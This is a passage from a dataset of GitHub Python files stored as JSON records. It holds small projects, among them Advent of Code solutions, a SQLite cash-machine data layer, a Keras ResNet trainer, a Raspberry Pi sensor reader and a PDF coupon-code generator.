dty.addPiece(pce4)\n self.assertEqual(len(dty.tasksRegistered), 3)\n\n self.assertEqual(dty.tasksRegistered[0].completedTime, (dt1 + dt2))\n self.assertEqual(dty.tasksRegistered[1].completedTime, (dt3))\n self.assertEqual(dty.tasksRegistered[2].completedTime, (dt4))\n\n\nif __name__ == '__main__':\n unittest.main()","repo_name":"patrick-deschambault/turboClock","sub_path":"TestDuty.py","file_name":"TestDuty.py","file_ext":"py","file_size_in_byte":1822,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"}
{"seq_id":"44290929256","text":"import numpy as np\n\n# Part 1\nwith open(\"./Day1/input.txt\") as f:\n data = list(map(int, f.read().splitlines()))\n count = 0\n top = np.inf\n for depth in data:\n if depth > top:\n count += 1\n top = depth\n print(\"Part 1 :\", count)\n\n# Part 2\nwith open(\"./Day1/input.txt\") as f:\n data = list(map(int, f.read().splitlines()))\n count = 0\n for i in range(len(data) - 3):\n if sum(data[i+1 : i+4]) > sum(data[i : i+3]):\n count += 1\n print(\"Part 2 :\", count)\n","repo_name":"ThomasLepercq/AdventOfCode2021","sub_path":"Day1/Day1.py","file_name":"Day1.py","file_ext":"py","file_size_in_byte":514,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"}
{"seq_id":"33268331303","text":"from datetime import datetime\nfrom sqlite3 import Error\nfrom sqlite3 import connect\n\nfrom cash_machine import CacheMachine\nfrom transaction import Transaction\nfrom transaction import TransactionType\nfrom user import User\nfrom user import UserRole\n\n\nclass SystemDao:\n DB_FILE = \"cash_machine.db\"\n\n SELECT_USER_BY_USERNAME = \"\"\" SELECT * FROM users\n WHERE username = ?\n ; \"\"\"\n\n INSERT_USER_SQL = \"\"\"INSERT INTO users(username, password, role) \n VALUES (?,?,?)\n ;\"\"\"\n\n SELECT_AVAILABLE_BANKNOTES_QUERY = \"\"\" SELECT * FROM banknotes \n WHERE count > 0\n ORDER BY denomination DESC\n ;\"\"\"\n\n SELECT_WITHDRAW_LIMIT_QUERY = \"\"\" SELECT * FROM withdraw_limit; \"\"\"\n\n UPDATE_BANKNOTES_SQL = \"\"\" UPDATE banknotes \n SET count = ?\n WHERE DENOMINATION = ?\n ;\"\"\"\n\n UPDATE_WITHDRAW_LIMIT_SQL = \"\"\" UPDATE withdraw_limit \n SET value = ?\n ;\"\"\"\n\n UPDATE_USER_BALANCE_SQL = \"\"\" UPDATE users \n SET balance = ?\n WHERE id = ?\n ;\"\"\"\n\n INSERT_TRANSACTION_SQL = \"\"\"INSERT INTO transactions(user_id, amount, type, timestamp) \n VALUES (?,?,?,?)\n ;\"\"\"\n\n SELECT_TRANSACTIONS_BY_USER_ID_QUERY = \"\"\"SELECT * FROM transactions\n WHERE user_id = ?\n ;\"\"\"\n\n def __init__(self) -> None:\n self.__connection = connect(SystemDao.DB_FILE)\n\n def __del__(self) -> None:\n self.__connection.close()\n\n def get_user_by_username(self, username: str) -> User:\n cursor = self.__connection.cursor()\n cursor.execute(SystemDao.SELECT_USER_BY_USERNAME, (username,))\n user_raw = cursor.fetchone()\n return User(user_raw[0], user_raw[1], user_raw[2], UserRole[user_raw[3].upper()], user_raw[4]) if user_raw else None\n\n def insert_new_user(self, user) -> User:\n try:\n cursor = self.__connection.cursor()\n cursor.execute(SystemDao.INSERT_USER_SQL, (user.username, user.password, str(user.role)))\n self.__connection.commit()\n user.id = cursor.lastrowid\n except Error as e:\n print(\"Error while saving a new user:\", e)\n self.__connection.rollback()\n return user\n\n def update_user_balance(self, user) -> bool:\n try:\n cursor = self.__connection.cursor()\n cursor.execute(SystemDao.UPDATE_USER_BALANCE_SQL, (user.balance, user.id))\n 
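# commit immediately so the balance update is durable before reporting success\n 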
self.__connection.commit()\n return True\n except Error as e:\n print(\"Error while updating the user's balance:\", e)\n self.__connection.rollback()\n return False\n\n def get_cash_machine(self) -> CacheMachine:\n return CacheMachine(self.__get_available_banknotes(), self.__get_withdraw_limit())\n\n def __get_available_banknotes(self) -> dict:\n cursor = self.__connection.cursor()\n cursor.execute(SystemDao.SELECT_AVAILABLE_BANKNOTES_QUERY)\n return {banknote[1]: banknote[2] for banknote in cursor.fetchall()}\n\n def __get_withdraw_limit(self) -> int:\n cursor = self.__connection.cursor()\n cursor.execute(SystemDao.SELECT_WITHDRAW_LIMIT_QUERY)\n return cursor.fetchone()[1]\n\n def update_cash_machine(self, cache_machine: CacheMachine) -> bool:\n try:\n self.__update_available_banknotes(cache_machine.banknotes)\n self.__update_withdraw_limit(cache_machine.withdraw_limit)\n self.__connection.commit()\n return True\n except Error as e:\n print(\"Error while saving the cash machine state:\", e)\n self.__connection.rollback()\n return False\n\n def __update_available_banknotes(self, banknotes) -> None:\n cursor = self.__connection.cursor()\n for denomination, count in banknotes.items():\n cursor.execute(SystemDao.UPDATE_BANKNOTES_SQL, (count, denomination))\n\n def __update_withdraw_limit(self, withdraw_limit) -> None:\n cursor = self.__connection.cursor()\n cursor.execute(SystemDao.UPDATE_WITHDRAW_LIMIT_SQL, (withdraw_limit,))\n\n def get_transactions_by_user(self, user) -> list:\n cursor = self.__connection.cursor()\n cursor.execute(SystemDao.SELECT_TRANSACTIONS_BY_USER_ID_QUERY, (user.id,))\n raw_transactions = cursor.fetchall()\n transactions = []\n for raw_transaction in raw_transactions:\n transaction = Transaction(raw_transaction[0], user, raw_transaction[2],\n TransactionType[raw_transaction[3].upper()],\n datetime.fromisoformat(raw_transaction[4]))\n transactions.append(transaction)\n return transactions\n\n def save_data_after_transaction(self, transaction, cash_machine) -> bool:\n try:\n cursor = self.__connection.cursor()\n cursor.execute(SystemDao.UPDATE_USER_BALANCE_SQL, (transaction.user.balance, transaction.user.id))\n self.__update_available_banknotes(cash_machine.banknotes)\n self.__update_withdraw_limit(cash_machine.withdraw_limit)\n cursor.execute(SystemDao.INSERT_TRANSACTION_SQL, (transaction.user.id, transaction.amount,\n str(transaction.transaction_type), transaction.timestamp))\n self.__connection.commit()\n return True\n except Error as e:\n self.__connection.rollback()\n print(\"Error while saving data after the transaction:\", e)\n return False\n","repo_name":"CatherineSM/Python","sub_path":"HT_14/system_dao.py","file_name":"system_dao.py","file_ext":"py","file_size_in_byte":6136,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"}
{"seq_id":"9618967727","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Tue Apr 10 10:46:38 2018\r\n\r\n@author: Herman Wu\r\n\"\"\"\r\n\r\nimport numpy as np \r\nnp.random.seed(1337) # for reproducibility \r\nfrom keras.models import Sequential,Model \r\nfrom keras.layers import Add,Dense,Dropout,Activation,Input \r\nfrom keras.layers import GlobalMaxPooling2D,GlobalAveragePooling2D,ZeroPadding2D \r\nfrom keras import optimizers \r\nfrom keras.layers import Conv2D\r\nfrom keras.layers.normalization import BatchNormalization\r\nfrom keras.initializers import glorot_uniform\r\nimport time\r\nimport keras.backend as K\r\nfrom keras.models import load_model\r\nfrom keras.callbacks 
import Callback\r\n\r\nclass ElapsedTimer(object):\r\n def __init__(self):\r\n self.start_time = time.time()\r\n def elapsed(self,sec):\r\n if sec < 60:\r\n return str(sec) + \" sec\"\r\n elif sec < (60 * 60):\r\n return str(sec / 60) + \" min\"\r\n else:\r\n return str(sec / (60 * 60)) + \" hr\"\r\n def elapsed_time(self):\r\n print(\"The running time of this code: %s \" % self.elapsed(time.time() - self.start_time) )\r\n\r\nclass LossHistory(Callback):\r\n def on_train_begin(self, logs={}):\r\n self.losses = []\r\n \r\n def on_batch_end(self, batch, logs={}):\r\n self.losses.append(logs.get('loss'))\r\n \r\ndef Identity_Block(inputs,filters):\r\n Filter1,Filter2,Filter3=filters\r\n########################################################################################################### \r\n x1=Conv2D(Filter1,(1,1),padding='same',kernel_initializer=glorot_uniform(seed=0))(inputs)\r\n z1=BatchNormalization(axis=3)(x1)\r\n a1=Activation('elu')(z1)\r\n \r\n x2=Conv2D(Filter2,(3,3),padding='same',kernel_initializer=glorot_uniform(seed=0))(a1)\r\n z2=BatchNormalization(axis=3)(x2)\r\n a2=Activation('elu')(z2)\r\n \r\n x3=Conv2D(Filter3,(1,1),padding='same',kernel_initializer=glorot_uniform(seed=0))(a2)\r\n z3=BatchNormalization(axis=3)(x3)\r\n \r\n z_sum=Add()([z3,inputs])\r\n a3=Activation('elu')(z_sum)\r\n########################################################################################################### \r\n return a3\r\n\r\ndef Convolution_Block(inputs,filters):\r\n Filter1,Filter2,Filter3=filters\r\n########################################################################################################### \r\n x1=Conv2D(Filter1,(1,1),padding='same',kernel_initializer=glorot_uniform(seed=0))(inputs) \r\n z1=BatchNormalization(axis=3)(x1)\r\n a1=Activation('elu')(z1)\r\n \r\n x2=Conv2D(Filter2,(3,3),padding='same',kernel_initializer=glorot_uniform(seed=0))(a1)\r\n z2=BatchNormalization(axis=3)(x2)\r\n a2=Activation('elu')(z2)\r\n \r\n x3=Conv2D(Filter3,(1,1),padding='same',kernel_initializer=glorot_uniform(seed=0))(a2)\r\n z3=BatchNormalization(axis=3)(x3)\r\n \r\n x_shortcut=Conv2D(Filter3,(1,1),padding='same',kernel_initializer=glorot_uniform(seed=0))(inputs)\r\n z_shortcut=BatchNormalization(axis=3)(x_shortcut)\r\n \r\n z_sum=Add()([z3,z_shortcut])\r\n a3=Activation('elu')(z_sum)\r\n########################################################################################################### \r\n return a3 \r\n \r\ndef ModelBuild(model,input_shape):\r\n inputs = Input(input_shape)\r\n X_inputs=ZeroPadding2D((1,1))(inputs)\r\n \r\n c1=Conv2D(24,(3,3),padding='valid',data_format=\"channels_last\",kernel_initializer=glorot_uniform(seed=0))(X_inputs)\r\n b1=BatchNormalization(axis=3)(c1)\r\n r1=Activation('elu')(b1)\r\n########################################################################################################### \r\n Con1=Convolution_Block(r1,[24,24,48])\r\n Iden1=Identity_Block(Con1,[24,24,48])\r\n Iden2=Identity_Block(Iden1,[24,24,48])\r\n \r\n Con2=Convolution_Block(Iden2,[48,48,64])\r\n Iden3=Identity_Block(Con2,[48,48,64])\r\n Iden4=Identity_Block(Iden3,[48,48,64])\r\n\r\n Con3=Convolution_Block(Iden4,[64,64,72])\r\n Iden5=Identity_Block(Con3,[64,64,72])\r\n Iden6=Identity_Block(Iden5,[64,64,72])\r\n\r\n Con4=Convolution_Block(Iden6,[72,72,84])\r\n Iden6=Identity_Block(Con4,[72,72,84])\r\n Iden7=Identity_Block(Iden6,[72,72,84])\r\n \r\n 
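# global average pooling collapses the spatial dimensions, so the network accepts variable-sized inputs\r\n 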
f1=GlobalAveragePooling2D(name='Glob_MaxPool_Lay')(Iden7)\r\n########################################################################################################### \r\n drop1=Dropout(0.4,name='Drop_1')(f1)\r\n # d1=Dense(64,activation='relu',name='DenseLay_1')(drop1)\r\n d2=Dense(48,activation='relu',name='DenseLay_2')(drop1)\r\n d3=Dense(24,activation='elu',name='DenseLay_3')(d2)\r\n O1=Dense(1,activation='elu',name='OutLay')(d3)\r\n model = Model(input=inputs, output=O1)\r\n return model\r\n########################################################################################################### \r\ndef mean_pred(y_true,y_pred):\r\n return K.mean(y_pred)\r\n\r\ndef configure(model,Loss='mse'):\r\n optimizers.rmsprop(lr=0.045)\r\n model.compile(loss=Loss,optimizer='rmsprop')#,metrics=[mean_pred])\r\n print('\\n################ The Detail of the ResNet ###################') \r\n print(model.summary())\r\n time.sleep(5)\r\n print('\\n######################################################################\\n')\r\n\r\ndef Single_main(Base_dir,Docx,DocY,epoch=3000,batch_size=50,TF=False,mode=None):\r\n in_shape= (None, None, 1) \r\n# Four_InputX=Docx['4by4_data']\r\n# Four_InputY=DocY['4by4_data']\r\n Five_InputX=Docx['5by5_data']\r\n Five_InputY=DocY['5by5_data']\r\n# Six_InputX=Docx['6by6_data']\r\n# Six_InputY=DocY['6by6_data']\r\n \r\n if TF==False:\r\n Network=Sequential()\r\n Network=ModelBuild(Network,in_shape)\r\n configure(Network)\r\n else :\r\n H5_file=Base_dir+'/predict_h5file/5by5_ConcatNet.h5'\r\n Network=load_model(H5_file)\r\n \r\n timer = ElapsedTimer() \r\n\r\n history = LossHistory()\r\n print('/*******************************************************/\\n')\r\n print(' Now we begin to train this model.\\n')\r\n print('/*******************************************************/\\n') \r\n if mode=='4by4':\r\n Network.fit(Four_InputX,Four_InputY,epochs=epoch,batch_size=batch_size,validation_split=0.1,shuffle=True)\r\n elif mode=='5by5':\r\n Network.fit(Five_InputX,Five_InputY,epochs=epoch,batch_size=batch_size,validation_split=0.1,shuffle=True,callbacks=[history])\r\n elif mode=='6by6':\r\n Network.fit(Six_InputX,Six_InputY,epochs=epoch,batch_size=batch_size,validation_split=0.1,shuffle=True) \r\n# =============================================================================\r\n print('/*******************************************************/')\r\n print(' finished!! 
')\r\n timer.elapsed_time()\r\n\r\n print('/*******************************************************/\\n') \r\n return Network,history\r\n\r\ndef main(Base_dir,Docx,DocY,epoch=3000,batch_size=50,TF=False):\r\n in_shape= (None, None, 1) \r\n History_4by4=[]\r\n History_5by5=[]\r\n History_6by6=[]\r\n# Iteration_num=int(len(Docx['6by6_data'])/batch_size);\r\n temp_len=max(len(Docx['4by4_data']),len(Docx['5by5_data']),len(Docx['6by6_data']))\r\n Iteration_num=int(temp_len//batch_size);\r\n Four_num=int(len(Docx['4by4_data'])//batch_size);\r\n Five_num=int(len(Docx['5by5_data'])//batch_size);\r\n Six_num=int(len(Docx['6by6_data'])//batch_size); \r\n Four_InputX=Docx['4by4_data']\r\n Four_InputY=DocY['4by4_data']\r\n Five_InputX=Docx['5by5_data']\r\n Five_InputY=DocY['5by5_data']\r\n Six_InputX=Docx['6by6_data']\r\n Six_InputY=DocY['6by6_data']\r\n\r\n########################################################################################################### \r\n if TF==False:\r\n Network=Sequential()\r\n Network=ModelBuild(Network,in_shape)\r\n configure(Network)\r\n else :\r\n H5_file=Base_dir+'/predict_h5file/5by5_ResNet.h5'\r\n Network=load_model(H5_file)\r\n########################################################################################################### \r\n timer = ElapsedTimer() \r\n print('/*******************************************************/\\n')\r\n print(' Now we begin to train this model.\\n')\r\n print('/*******************************************************/\\n') \r\n########################################################################################################### \r\n for i in range(epoch):\r\n for j in range(Iteration_num):\r\n if (j+1)*batch_size>len(Docx['4by4_data']):\r\n j0=j%Four_num\r\n History_4by4.append(Network.train_on_batch(Four_InputX[j0*batch_size:(j0+1)*batch_size,:,:,:],Four_InputY[j0*batch_size:(j0+1)*batch_size,:]))\r\n else:\r\n History_4by4.append(Network.train_on_batch(Four_InputX[j*batch_size:(j+1)*batch_size,:,:,:],Four_InputY[j*batch_size:(j+1)*batch_size,:]))\r\n if (j+1)*batch_size>len(Docx['5by5_data']):\r\n j0=j%Five_num\r\n History_5by5.append(Network.train_on_batch(Five_InputX[j0*batch_size:(j0+1)*batch_size,:,:,:],Five_InputY[j0*batch_size:(j0+1)*batch_size,:]))\r\n else:\r\n History_5by5.append(Network.train_on_batch(Five_InputX[j*batch_size:(j+1)*batch_size,:,:,:],Five_InputY[j*batch_size:(j+1)*batch_size,:])) \r\n if (j+1)*batch_size>len(Docx['6by6_data']):\r\n j0=j%Six_num\r\n History_6by6.append(Network.train_on_batch(Six_InputX[j0*batch_size:(j0+1)*batch_size,:,:,:],Six_InputY[j0*batch_size:(j0+1)*batch_size,:]))\r\n else:\r\n History_6by6.append(Network.train_on_batch(Six_InputX[j*batch_size:(j+1)*batch_size,:,:,:],Six_InputY[j*batch_size:(j+1)*batch_size,:])) \r\n if (i%20==0):\r\n print('In iteration '+str(i)+', The Training detail is : 4by4: '+ str(History_4by4[i])) \r\n print('In iteration '+str(i)+', The Training detail is : 5by5: '+ str(History_5by5[i])) \r\n print('In iteration '+str(i)+', The Training detail is : 6by6: '+ str(History_6by6[i])+'\\n') \r\n########################################################################################################### \r\n print('/*******************************************************/')\r\n print(' finished!! 
')\r\n########################################################################################################### \r\n if TF==True:\r\n h5_dir=Base_dir+'/predict_h5file/total_TF6_Rcn.h5'\r\n elif TF==False:\r\n h5_dir=Base_dir+'/predict_h5file/total_Non-TF_Rcn.h5'\r\n Network.save(h5_dir)\r\n timer.elapsed_time()\r\n print('/*******************************************************/\\n') \r\n return Network\r\n","repo_name":"jianlin-cheng/DeepGraphene","sub_path":"Graphene_DeepLearning/Script/Predict/DeepGraphene/Residual_Net.py","file_name":"Residual_Net.py","file_ext":"py","file_size_in_byte":10684,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"48"} +{"seq_id":"3693820472","text":"import pandas as pd\nimport numpy as np\nfrom cross_content_based_recSys.CrossContentBasedRecSys import ContentBasedRecSys, CrossEmbContentBasedREcSys\nfrom influence_graph.InfluenceGraph import InfluenceGraph\n\ndf_ml_movies = pd.read_csv('/home/ignacio/Datasets/Amazon/Data cleaned/movie_meta_valid_genres_description.csv')\ndf_bx_book = pd.read_csv('/home/ignacio/Datasets/Amazon/Data cleaned/book_meta_valid_shelves_rating_description.csv')\ndf_bx_book['common-shelves'] = df_bx_book['common-shelves'].fillna('')\ndf_movie_ratings = pd.read_csv('/home/ignacio/Datasets/Amazon/Data cleaned/ratings_movie_intersect_ii.csv')\ndf_bu = pd.read_csv('/home/ignacio/Datasets/Amazon/Data cleaned/movie_bu.csv')\n#Define influence graph\ng_social = InfluenceGraph()\n\n#origen_space\ntfidf_matrix_origen = np.load('/home/ignacio/Datasets/Amazon/Data cleaned/Embedding/Target to Origin space/movie_space.npy')\n\n#target_space\ntfidf_matrix_target = np.load('/home/ignacio/Datasets/Amazon/Data cleaned/Embedding/Target to Origin space/book_space.npy')\n\n#user_space\nusers_profiles_matrix = np.load('/home/ignacio/Datasets/Amazon/Data cleaned/Embedding/Target to Origin space/user_space.npy')\nusers_id = df_movie_ratings['userId'].unique()\nusers_profiles = {}\nidx = 0\nfor user_id in users_id:\n users_profiles[user_id] = users_profiles_matrix[idx].reshape(1,-1)\n idx += 1\n\n#Define model\ncross_content_model = CrossEmbContentBasedREcSys(\n df_items_origen=df_ml_movies, df_items_target=df_bx_book ,tfidf_matrix_origen= tfidf_matrix_origen,\n user_profile=users_profiles, tfidf_matrix_target=tfidf_matrix_target, df_bu= df_bu, rating_matrix= df_movie_ratings)\n\n\nresult = cross_content_model.recommend_items(user_id='AGEIT17HENDIS')\n\nresult.to_csv('/home/ignacio/Datasets/Amazon/Data cleaned/Recommendation/Embedding/recommendation_rating_proof.csv', index=False)\nprint(result.head())","repo_name":"ignaciogatti/CrossDomRecSys","sub_path":"test_embedding/TestCBEmbRecSys.py","file_name":"TestCBEmbRecSys.py","file_ext":"py","file_size_in_byte":1864,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"48"} +{"seq_id":"42379509399","text":"def main():\n\n lista = []\n \n print ('CADASTRO DE USUÁRIOS')\n\n for i in range (1,4):\n print(f'\\nCadastro {i}')\n usuario = {\n 'nome':input(\"Nome: \").upper(),\n 'endereco':input(\"Endereço: \"),\n 'cpf':input(\"CPF: \"),\n }\n lista.append(usuario)\n\n print ('\\nLISTA DE USUÁRIOS CADASTRADOS') \n\n for i in range (0,3):\n print(f'\\nUsuário {i+1}')\n print (f\"Nome: {lista[i]['nome']}\")\n print (f\"Endereço: {lista[i]['endereco']}\")\n print (f\"CPF: {lista[i]['cpf']}\")\n 
\n\nmain()","repo_name":"joaohfgarcia/python","sub_path":"uniesp_p2/dicionarios_exE.py","file_name":"dicionarios_exE.py","file_ext":"py","file_size_in_byte":573,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"}
{"seq_id":"14362847367","text":"import parametrages # import the file of variables needed for the program to work properly\n\nimport board # each port has a board directory (address) holding the boards of a specific microcontroller line\n\nimport sys # interacts with the Python interpreter\nimport time\n\nimport adafruit_shtc3 # address of the temperature and humidity sensor\nimport adafruit_lps2x # address of the pressure sensor\n\n# i2c: computer bus (sensehat(B) sensors) --> clock and data lines used for both sending and receiving data \n\ni2c = board.I2C()\n\ndef recup_capteurs(): # returns temperature, humidity, pressure\n sht = adafruit_shtc3.SHTC3(i2c) # initialise the temperature/humidity sensor variable\n lps = adafruit_lps2x.LPS22(i2c,0x5c) # initialise the pressure sensor variable, address changed to 0x5c\n return sht.temperature, sht.relative_humidity, lps.pressure\n\n\n\n######################### Main #########################################################################################\n\nprint (\"Testing reception of sensor data:\\n\")\nwhile True:\n try:\n temperature, humidite, pression = recup_capteurs()\n print (\"Temperature: %0.1f °C\" % temperature)\n print (\"Humidity: %0.1f %%fH\" % humidite)\n print (\"Pressure: %.2f hPa\" % pression)\n time.sleep(parametrages.temps)\n except KeyboardInterrupt:\n sys.exit(\"\\nProgram stopped.\") # terminates the running program\n","repo_name":"ilanouk/DigitalTwinProject","sub_path":"Raspberry_capteurs/Test/test_recup_capteurs.py","file_name":"test_recup_capteurs.py","file_ext":"py","file_size_in_byte":1550,"program_lang":"python","lang":"fr","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"}
{"seq_id":"5601350502","text":"from torchvision import datasets, transforms\r\nimport torch\r\nimport torch.nn as nn\r\nfrom torch.utils.data import DataLoader\r\n\r\ncustom_transform = transforms.Compose([transforms.ToTensor()])\r\n\r\n\r\ndef make_data_loader(args):\r\n custom_transform = transforms.Compose([transforms.ToTensor()])\r\n\r\n # Get Dataset\r\n dataset = datasets.CIFAR10(\r\n args.data, train=True, transform=custom_transform, download=True\r\n )\r\n\r\n # Split dataset into train, validation, and test sets\r\n train_size = int(0.8 * len(dataset))\r\n val_size = int(0.1 * len(dataset))\r\n test_size = len(dataset) - train_size - val_size\r\n train_dataset, val_dataset, test_dataset = torch.utils.data.random_split(\r\n dataset, [train_size, val_size, test_size]\r\n )\r\n\r\n # Get DataLoaders\r\n train_loader = DataLoader(train_dataset, batch_size=args.batch_size, shuffle=True)\r\n val_loader = DataLoader(val_dataset, batch_size=args.batch_size, shuffle=False)\r\n test_loader = DataLoader(test_dataset, batch_size=args.batch_size, shuffle=False)\r\n\r\n return train_loader, val_loader, test_loader\r\n","repo_name":"ydoo123/DeepL_project","sub_path":"utils/_utils.py","file_name":"_utils.py","file_ext":"py","file_size_in_byte":1098,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"}
{"seq_id":"25080934332","text":"arr = []\n\nwhile True:\n num = input()\n if num == \".\":\n break\n else:\n arr.append(float(num))\n \n 
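# scan the collected values for the smallest one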
\nminimum = arr[0]\n\nfor i in range(0, len(arr)):\n if arr[i] < minimum:\n minimum = arr[i]\n\nprint(minimum)\n","repo_name":"probablyArth/Zookeeper","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":237,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"13976302432","text":"from fpdf import FPDF\nimport sqlite3\nimport time\n\n\ndef write_codes(codes_it, name):\n pdf = FPDF('P', 'mm', (330, 480))\n pdf.add_font('Calibri', '', 'calibri.ttf', uni=True)\n pdf.set_author('Asen Georgiev')\n pdf.add_page()\n pdf.set_font('Calibri', '', 12) # B,I or U on the second position\n pdf.set_auto_page_break(False) # Not to add a new page when the cursor goes too low\n small_step = True\n x_ofs = 0\n y_ofs = 0\n pdf.ln(41) # header on the first page\n pdf.cell(20) # margin on the first page\n for code in codes_it:\n pdf.cell(20, 10, code, 0, 0, 'C')\n\n if x_ofs < 5: # if the line is not full\n pdf.cell(30) # right shifting in mm\n x_ofs += 1\n elif x_ofs == 5: # if the line is full\n if small_step:\n pdf.ln(24) # the small line shift in mm\n small_step = False\n pdf.rotate(180) # turning the letters upside down\n pdf.cell(-290) # shifting one full line because flipped line starts from the right\n else:\n pdf.ln(94) # the big line shift in mm\n pdf.rotate(0) # restoring the flipped letters\n pdf.cell(20)\n small_step = True\n\n if y_ofs < 7: # if the page is not full\n y_ofs += 1\n else: # if the page is full\n y_ofs = 0\n if pdf.page_no() < 1042: # not to have an empty page in the end\n pdf.add_page()\n pdf.ln(41) # header\n pdf.cell(20) # margin\n\n x_ofs = 0\n pdf.output(name, 'F')\n\n\ndef query_codes(amount, file_name):\n\n conn = sqlite3.connect('chio_codes.sqlite')\n cur = conn.cursor()\n time_now = time.strftime('%Y-%m-%d %H:%M:%S')\n\n cur.execute('''INSERT OR IGNORE INTO Usage (datetime, pdf_file_name)\n VALUES (?, ?)''', (time_now, file_name))\n cur.execute('SELECT id FROM Usage WHERE datetime = ? ', (time_now, ))\n usage_id = cur.fetchone()[0]\n\n cur.execute('UPDATE Codes SET usage_id = ? WHERE id in (SELECT id FROM Codes WHERE usage_id IS NULL LIMIT ?)',\n (usage_id, amount))\n\n cur.execute('SELECT code FROM Codes WHERE usage_id = ? ', (usage_id, ))\n codes_it = cur.fetchall()\n conn.commit()\n return (code[0] for code in codes_it)\n\n\ndef ren_file(file_name):\n\n conn = sqlite3.connect('chio_codes.sqlite')\n cur = conn.cursor()\n cur.execute('SELECT id FROM Usage WHERE pdf_file_name = ? ', (file_name, ))\n file_id = cur.fetchone()[0]\n updated_file_name = f'{file_id}_{file_name}'\n\n return updated_file_name\n\n\nif __name__ == '__main__':\n for _ in range(106):\n out_file = 'Chio_Codes_{}.pdf'.format(time.strftime('%Y_%m_%d_%H_%M_%S')) # adds to db the name without index\n codes = query_codes(50016, out_file) # 50016 codes per file, 1042 pages\n out_file_with_index = ren_file(out_file)\n write_codes(codes, out_file_with_index)\n","repo_name":"crawler4o/UpWork","sub_path":"codes_generator/pdf_writer.py","file_name":"pdf_writer.py","file_ext":"py","file_size_in_byte":3015,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"71704766227","text":"\"\"\" Given an array of strings words, return the first palindromic string in the array. If there is no such string, return an empty string \"\".\n\nA string is palindromic if it reads the same forward and backward. 
\"\"\"\n\nclass Solution:\n def firstPalindrome(self, words: List[str]) -> str:\n for word in words:\n l,r = 0, len(word) - 1\n \n while l < r:\n if word[l] != word[r]:\n break\n \n l += 1\n r -= 1\n if l >= r:\n return word\n \n return \"\"","repo_name":"kotynskm/leetcode","sub_path":"firstpalindrome.py","file_name":"firstpalindrome.py","file_ext":"py","file_size_in_byte":596,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"73036839827","text":"# https://adventofcode.com/2019/day/12\n\nfrom Universe import Universe\nfrom Moon import Moon\nimport math\nimport re\nfrom copy import copy\n\n\n\nf = open(\"Input12.txt\")\n\ninputs = f.read().splitlines()\nf.close()\n\ndef parse_moon(string):\n m = re.search(r'', string)\n x, y, z = int(m.group(1)), int(m.group(2)), int(m.group(3))\n return Moon(x, y, z)\n\n\n# --- Part 1 ---\n\nmoons = [parse_moon(str) for str in inputs]\nuniverse = Universe(moons)\n\nfor _ in range(1000):\n universe.step()\nprint(universe.total_energy())\n\n\n# --- Part 2 ---\n\ndef lowest_common_multiple(nums):\n lcm = nums[0]\n for i in nums[1:]:\n lcm = int(lcm*i/math.gcd(lcm, i))\n return lcm\n\ndef steps_to_repeat_per_axis(universe):\n initial_universe = copy(universe)\n steps_to_repeat = []\n for axis in ['x', 'y', 'z']:\n moons = [parse_moon(str) for str in inputs]\n universe = Universe(moons)\n universe.step()\n\n while not universe.equal_on_axis(axis, initial_universe):\n universe.step()\n steps_to_repeat.append(universe.steps)\n return steps_to_repeat\n\n\nmoons = [parse_moon(str) for str in inputs]\nuniverse = Universe(moons)\n\nsteps_to_repeat = steps_to_repeat_per_axis(universe)\n\nprint(lowest_common_multiple(steps_to_repeat))\n\n\n\n","repo_name":"xwmtp/advent-of-code-2019","sub_path":"Day12/Day12.py","file_name":"Day12.py","file_ext":"py","file_size_in_byte":1295,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"22717379341","text":"__author__ = 'Igor Sorokin'\n__email__ = 'igor.sorokin66@gmail.com'\n__status__ = 'Completed'\n\nrank = [\"A\", \"10\", \"10\", \"10\", \"10\", \"9\", \"8\", \"7\", \"6\", \"5\", \"4\", \"3\", \"2\"]\nsuit = [\"c\", \"s\", \"h\", \"d\"]\n\n\ndef generate_deck():\n deck = []\n for s in suit:\n for r in rank:\n deck.append(r)\n return deck\n\nimport random\nshoe = []\n[shoe.extend(generate_deck()) for i in range(6)]\nrandom.shuffle(shoe)\nprint(shoe)\n\nwhile True:\n if len(shoe) < 4:\n break\n dealer = [shoe.pop(), shoe.pop()]\n player = [shoe.pop(), shoe.pop()]\n\n if \"A\" not in player:\n total = int(player[0]) + int(player[1])\n\ndef decision(player, dealer):\n transPlayer = [9, 10, 11, 12, 13, 14, 15, 16]\n transDealer = [2, 3, 4, 5, 6, 7, 8, 9, 10, \"A\"]\n chart = [[\"H\", \"H\", \"H\", \"H\"],\n [\"H\", \"H\", \"H\", \"H\"],\n [\"H\", \"H\", \"H\", \"H\"],\n [\"H\", \"H\", \"H\", \"H\"]]","repo_name":"igorsorokin66/PokerHUD","sub_path":"Black.py","file_name":"Black.py","file_ext":"py","file_size_in_byte":899,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"70653062865","text":"from . 
